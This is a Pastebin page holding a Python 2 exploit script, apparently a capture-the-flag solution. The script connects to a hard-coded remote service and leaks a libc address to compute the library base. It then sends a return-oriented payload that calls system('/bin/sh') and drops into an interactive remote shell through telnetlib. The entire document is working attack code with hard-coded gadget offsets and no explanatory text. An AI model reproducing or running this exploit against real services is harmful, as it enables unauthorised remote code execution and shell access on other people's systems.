Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import socket, struct, binascii
- import telnetlib
- def readline(sc, show = True):
- res = ""
- while len(res) == 0 or res[-1] != "\n":
- data = sc.recv(1)
- if len(data) == 0:
- print repr(res)
- print "Server disconnected"
- exit()
- res += data
- if show:
- print repr(res[:-1])
- return res[:-1]
- def read_until(sc, s):
- res = ""
- while not res.endswith(s):
- data = sc.recv(1)
- if len(data) == 0:
- print repr(res)
- print "Server disconnected"
- exit()
- res += data
- return res
- def x(n):
- return struct.pack("<Q", n)
- if True:
- ip = ("136.243.194.41", 666)
- distance = 0x5795d0
- puts_offset = 0x0000000000070A30
- poprdi_offset = 0x000000000001F6B5
- system_offset = 0x00000000000443D0
- else:
- ip = ("10.0.0.97", 12345)
- distance = 0x55a610
- puts_offset = 0x000000000006B9F0
- poprdi_offset = 0x000000000001F6B2
- system_offset = 0x00000000000414F0
- sc = socket.create_connection(ip)
- s = "X" * 9
- sc.send(x(len(s)))
- sc.send(s)
- res = sc.recv(16384)
- addr = ("\x00" + res[9:].rstrip("\n")).ljust(8, "\x00")
- print binascii.b2a_hex(addr)
- addr = struct.unpack("<Q", addr)[0]
- print "address", hex(addr)
- libcbase = addr - (distance + puts_offset)
- s = "XXXXXXXX" + x(addr + 8 - 0x800) + x(0x00000000004004EE)
- sc.send(struct.pack("<Q", len(s)))
- sc.send(s)
- print "res", repr(sc.recv(16384))
- s = "XXXXXXXX" + "AAAAAAAA" + x(libcbase + poprdi_offset) + x(addr - 0x7d0) + "CCCCCCCC" + x(libcbase + system_offset) + "/bin/sh\x00"
- sc.send(struct.pack("<Q", len(s)))
- sc.send(s)
- res = sc.recv(16384)
- print "res", repr(res)
- t = telnetlib.Telnet()
- t.sock = sc
- t.interact()
- while True:
- data = sc.recv(16384)
- if len(data) == 0:
- break
- for line in data.split("\n"):
- print "xx", binascii.b2a_hex(line)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
